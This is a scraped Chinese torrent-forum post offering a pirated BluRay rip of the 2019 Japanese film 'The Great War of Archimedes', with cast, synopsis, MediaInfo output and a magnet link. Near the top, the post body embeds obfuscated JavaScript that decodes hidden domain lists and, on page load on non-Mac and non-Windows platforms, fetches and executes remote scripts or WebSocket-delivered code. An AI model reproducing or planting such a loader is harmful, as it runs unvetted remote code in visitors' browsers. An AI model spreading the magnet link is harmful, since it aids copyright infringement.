阿基米德大战[中文字幕].Yamato.Schlacht.um.Japan.2019.1080p.BluRay.DTS.x265-10bit-迅雷下载 7.30GB

版主小s 23天前 446

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 阿基米德大战/The Great War of Archimedes/阿基米德的战争

◎片 名 アルキメデスの大戦

◎年 代 2019

◎产 地 日本

◎类 别 剧情 / 战争

◎语 言 日语

◎上映日期 2019-07-26(日本)

◎豆瓣评分 7.4/10 from 11073 users

◎豆瓣链接 https://movie.douban.com/subject/30267284/

◎片 长 130分钟

◎导 演 山崎贵 Takashi Yamazaki

◎编 剧 山崎贵 Takashi Yamazaki

◎主 演 菅田将晖 Masaki Suda

馆博 Hiroshi Tachi

滨边美波 Minami Hamabe

柄本佑 Tasuku Emoto

小林克也 Katsuya Kobayashi

小日向文世 Fumiyo Kohinata

国村隼 Jun Kunimura

桥爪功 Isao Hashizume

田中泯 Min Tanaka

沟口奈菜 Nana Mizoguchi

◎标 签 二战 | 日本 | 战争 | 日本电影 | 剧情 | 2019 | 菅田将晖 | 漫画改编

◎简 介

三田纪房人气漫画<阿基米德大战>将拍摄真人电影,山崎贵导演,菅田将晖主演。

故事舞台设定在二战对美开战前,为了设计大和号战舰,山本五十六找到了被称为“阿基米德再生”的天才数学家櫂直。然而,随着计划的深入,櫂直发现了军部不可告人的阴谋。

影片将于明年暑假公映,东宝2019年度大作。

◎获奖情况

第43届日本电影学院奖 ?(2020)

最佳男主角(提名) 菅田将晖

最佳男配角(提名) 柄本佑

最佳美术指导(提名)

最佳剪辑(提名)

第7届豆瓣电影年度榜单 ?(2020)

评分最高的日本电影(提名)

  1. General

  2. Unique ID : 290912753653234853750492298384421842943 (0xDADBC222FEE2D889847903C01B0E6FFF)

  3. Complete name : Yamato.Schlacht.um.Japan.2019.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.30 GiB

  7. Duration : 2 h 9 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 8 065 kb/s

  10. Movie name : Yamato Schlacht um Japan 2019 1080p BluRay DTS x265-10bit-HDS

  11. Encoded date : UTC 2021-05-14 18:35:25

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 9 min

  21. Bit rate : 6 279 kb/s

  22. Width : 1 920 pixels

  23. Height : 804 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.169

  31. Stream size : 5.68 GiB (78%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 2 h 9 min

  43. Bit rate mode : Variable

  44. Bit rate : 1 743 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossless

  51. Stream size : 1.58 GiB (22%)

  52. Title : Japanese

  53. Language : Japanese

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 2 h 2 min

  63. Bit rate : 38.9 kb/s

  64. Count of elements : 2930

  65. Stream size : 34.2 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 2 h 2 min

  77. Bit rate : 40.2 kb/s

  78. Count of elements : 2930

  79. Stream size : 35.3 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:06:46.708 : en:Chapter 02

  87. 00:16:04.375 : en:Chapter 03

  88. 00:29:16.125 : en:Chapter 04

  89. 00:37:32.458 : en:Chapter 05

  90. 00:48:19.167 : en:Chapter 06

  91. 01:00:07.542 : en:Chapter 07

  92. 01:11:14.167 : en:Chapter 08

  93. 01:27:32.833 : en:Chapter 09

  94. 01:46:11.583 : en:Chapter 10

  95. 01:53:36.625 : en:Chapter 11

  96. 02:00:27.500 : en:Chapter 12


TAGS 剧情 战争

磁力链:
  • magnet:?xt=urn:btih:2AF597686E6A2A091FA28AC5F1574492151E77C5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回